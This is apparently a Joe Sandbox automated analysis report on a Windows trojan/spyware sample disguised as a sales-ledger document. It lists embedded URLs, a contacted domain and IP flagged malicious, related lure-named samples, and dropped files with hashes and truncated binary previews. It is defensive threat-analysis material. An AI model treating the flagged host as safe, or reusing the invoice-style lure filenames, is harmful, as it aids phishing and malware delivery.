http://www.msn.com/?ocid=iehp	cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp	false		high
https://sectigo.com/CPS0C	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://sectigo.com/CPS0D	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fonts.com	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.nirsoft.net/	AdvancedRun.exe, AdvancedRun.exe, 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000015.00000000.299126160.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.0.dr	false		high
http://www.zhongyicts.com.cn	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/5i	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.msn.com/de-ch/ocid=iehp	cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp	false		high
http://www.msn.com/de-ch/?ocid=iehp.	cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp	false		high
http://www.msn.com/de-ch/?ocid=iehpj	cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/-czti	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/?ocid=iehpc	cmmon32.exe, 00000020.00000003.386291684.00000000030DF000.00000004.00000001.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/d.	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.seniorlivingcaelderly.com	explorer.exe, 00000019.00000002.497484764.00000000061E3000.00000040.00000001.sdmp, cmmon32.exe, 00000020.00000002.484792584.0000000005349000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htmcP	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000016.00000003.399833270.0000000005A8D000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/fi	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/Bi)	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cnto	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.241708507.0000000005871000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/q	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.242943283.0000000005863000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000016.00000003.393538645.0000000007FF4000.00000004.00000001.sdmp	false		high
http://james.newtonking.com/projects/json	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.newtonsoft.com/jsonschema	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.324077435.0000000007520000.00000004.00000001.sdmp	false		high
http://www.carterandcone.coml	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.msn.com/de-ch/?ocid=iehp	cmmon32.exe, 00000020.00000003.390011367.00000000030E2000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000003.390090022.00000000030FD000.00000004.00000001.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/Y0ftYi	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/q	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/Yi	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.310610016.0000000003C09000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comti	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.312826232.000000000586A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp, Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.319815659.00000000059D0000.00000002.00000001.sdmp, explorer.exe, 00000019.00000000.349817912.0000000008B40000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/fi	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243339733.000000000586B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/Pi	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243557863.000000000586A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/(i	Require your Sales Ledger from 01-April-2020.exe, 00000000.00000003.243201190.000000000586B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.53.179.90	www.seniorlivingcaelderly.com	Germany		61969	TEAMINTERNET-ASDE	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	385451
Start date:	12.04.2021
Start time:	14:38:30
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 39s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Require your Sales Ledger from 01-April-2020.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	39
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@18/14@2/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 14.2% (good quality ratio 13.2%) Quality average: 78.2% Quality standard deviation: 28.7%
HCA Information:	Successful, ratio: 93% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.82.210.154, 13.88.21.125, 92.122.145.220, 184.30.24.56, 20.50.102.62, 104.43.139.144, 2.20.142.210, 2.20.142.209, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129, 52.147.198.201, 52.255.188.83, 13.64.90.137 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/385451/sample/Require your Sales Ledger from 01-April-2020.exe

Simulations

Behavior and APIs

Time	Type	Description
14:40:37	API Interceptor	17x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TEAMINTERNET-ASDE	52FFDD3BC0DE63EB8F6CD8A90373EAF3BCC37BB0804FC.exe	Get hash	malicious	Browse	185.53.177.71
	PO#560.zip.exe	Get hash	malicious	Browse	185.53.177.14
	safecrypt.exe	Get hash	malicious	Browse	185.53.178.54
	RFQ HAN4323.exe	Get hash	malicious	Browse	185.53.177.11
	Doc.exe	Get hash	malicious	Browse	185.53.178.14
	payment slip_pdf.exe	Get hash	malicious	Browse	185.53.177.10
	iQnbU4o7yx.exe	Get hash	malicious	Browse	185.53.179.28
	requisition from ASTRO EXPRESS.xlsx	Get hash	malicious	Browse	185.53.177.10
	inquiry 19117030P.xlsx	Get hash	malicious	Browse	185.53.177.14
	HwL7D1UcZG.exe	Get hash	malicious	Browse	185.53.177.13
	CREDIT NOTE DEBIT NOTE 30.1.2021.xlsx	Get hash	malicious	Browse	185.53.177.13
	CiL08gVVjl.exe	Get hash	malicious	Browse	185.53.177.13
	Mv Maersk Kleven V949E.xlsx	Get hash	malicious	Browse	185.53.177.13
	Inquiry PR11020204168.xlsx	Get hash	malicious	Browse	185.53.177.13
	PO210119.exe.exe	Get hash	malicious	Browse	185.53.178.53
	payment advice002436_pdf.exe	Get hash	malicious	Browse	185.53.177.10
	PDRgIfT71e.exe	Get hash	malicious	Browse	185.53.177.13
	Payment Advice.xlsx	Get hash	malicious	Browse	185.53.177.13
	payment advice00000789_pdf.exe	Get hash	malicious	Browse	185.53.177.10
	Q52msELKeI.exe	Get hash	malicious	Browse	185.53.178.13

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\AdvancedRun.exe	Account Confirmation.exe	Get hash	malicious	Browse
	Download Report.08.04.2021.pdf.exe	Get hash	malicious	Browse
	ORDER-02188.exe	Get hash	malicious	Browse
	08042021New-PurchaseOrder.exe	Get hash	malicious	Browse
	RFQ-034.exe	Get hash	malicious	Browse
	Payment Slip.exe	Get hash	malicious	Browse
	Revised Invoice No CU 7035.exe	Get hash	malicious	Browse
	Sales_Order description.exe	Get hash	malicious	Browse
	Outstanding invoices.exe	Get hash	malicious	Browse
	Q88_Bulk Carrier.exe	Get hash	malicious	Browse
	Payment _Slip copy.exe	Get hash	malicious	Browse
	MV. HUA KAI V-2023.exe	Get hash	malicious	Browse
	Order_April shipment.exe	Get hash	malicious	Browse
	INVOICE for Order PIEX310113978.exe	Get hash	malicious	Browse
	Krishna Gangaa Enviro System Pvt Ltd.exe	Get hash	malicious	Browse
	TT SWIFT COPY.exe	Get hash	malicious	Browse
	PO75773937475895377.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exe	Get hash	malicious	Browse
	Download Report.06.05.2021.exe	Get hash	malicious	Browse
	Outstanding invoices.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Require your Sales Ledger from 01-April-2020.exe.log Download File
Process:	C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1119
Entropy (8bit):	5.356708753875314
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
MD5:	3197B1D4714B56F2A6AC9E83761739AE
SHA1:	3B38010F0DF51C1D4D2C020138202DABB686741D
SHA-256:	40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
SHA-512:	58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	14734
Entropy (8bit):	4.993014478972177
Encrypted:	false
SSDEEP:	384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
MD5:	8D5E194411E038C060288366D6766D3D
SHA1:	DC1A8229ED0B909042065EA69253E86E86D71C88
SHA-256:	44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
SHA-512:	21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
Malicious:	false
Preview:	PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	22192
Entropy (8bit):	5.605242149765194
Encrypted:	false
SSDEEP:	384:ctCDC03SDl1u2b+JwSBKnIRultIo3D7Y9gxSJUeRe1BMrmbZaAV7E5WDm64I+iaS:HSDXu2kw4KOultp33xXeNq34pC
MD5:	DCA964DEC7B92F4DE1CDCFF994619018
SHA1:	47ED9EC01C5E990CF03D373489CADC37C4602014
SHA-256:	B0B560F92DD0FA69E5591F7ABADA4FE9BAC9193DCD11C136C75C14A1271D3199
SHA-512:	849187A8AE0C1B005C3351166449565CA89D203DD1B9E75EA82723ED7C3B1834E2AE5BEAEE1245328EFF2BE7C1EA02157D0F1EF31AF324538E855D92D5C559C0
Malicious:	false
Preview:	@...e...........e.......................;............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Download File
Process:	C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91000
Entropy (8bit):	6.241345766746317
Encrypted:	false
SSDEEP:	1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
MD5:	17FC12902F4769AF3A9271EB4E2DACCE
SHA1:	9A4A1581CC3971579574F837E110F3BD6D529DAB
SHA-256:	29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
SHA-512:	036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Account Confirmation.exe, Detection: malicious, Browse Filename: Download Report.08.04.2021.pdf.exe, Detection: malicious, Browse Filename: ORDER-02188.exe, Detection: malicious, Browse Filename: 08042021New-PurchaseOrder.exe, Detection: malicious, Browse Filename: RFQ-034.exe, Detection: malicious, Browse Filename: Payment Slip.exe, Detection: malicious, Browse Filename: Revised Invoice No CU 7035.exe, Detection: malicious, Browse Filename: Sales_Order description.exe, Detection: malicious, Browse Filename: Outstanding invoices.exe, Detection: malicious, Browse Filename: Q88_Bulk Carrier.exe, Detection: malicious, Browse Filename: Payment _Slip copy.exe, Detection: malicious, Browse Filename: MV. HUA KAI V-2023.exe, Detection: malicious, Browse Filename: Order_April shipment.exe, Detection: malicious, Browse Filename: INVOICE for Order PIEX310113978.exe, Detection: malicious, Browse Filename: Krishna Gangaa Enviro System Pvt Ltd.exe, Detection: malicious, Browse Filename: TT SWIFT COPY.exe, Detection: malicious, Browse Filename: PO75773937475895377.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exe, Detection: malicious, Browse Filename: Download Report.06.05.2021.exe, Detection: malicious, Browse Filename: Outstanding invoices.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....).....)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\DB1 Download File
Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	true
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Download File
Process:	C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	736256
Entropy (8bit):	7.158845349064943
Encrypted:	false
SSDEEP:	12288:JLwe/ZRRUxLGX9eW++HhtUnNJ2WD9cgMuwS2T8Xo2i10OlYKit:q0HRYLov+Yh+NzxFWgXh5K
MD5:	C7C27E1859F1593AEDB1EEBF0A15175E
SHA1:	DEB5544C037A7757462AFAB46AE2CA14A8F7F945
SHA-256:	D7E71646C9427067E810E1B278BEB6AD1F07E6B0C5003D9BE2611178E4F5470C
SHA-512:	7F8E332B6163EC2B052EAD9C9958C88DEAD193BEB5C6D93851190C9DFC27A6A78FD7FF461FB363DA6809F1134460F255DCA918BA3A23019A64870BEEDBCE2033
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!t`............................B.... ........@.. ....................................@.....................................W................................................................................... ............... ..H............text...H.... ...................... ..`.rsrc..............................@..@.reloc...............:..............@..B................$.......H.......X....2......{....G..hW...........................................(....(&......z.(......}.....(....o....}......0...........{............3.....(.......................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X ...Q.{....Xa}......}.....{....oo...:q....(....+..(........}.........(......*................n..}.....{....,..{....o}

C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2uarlegt.1xt.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
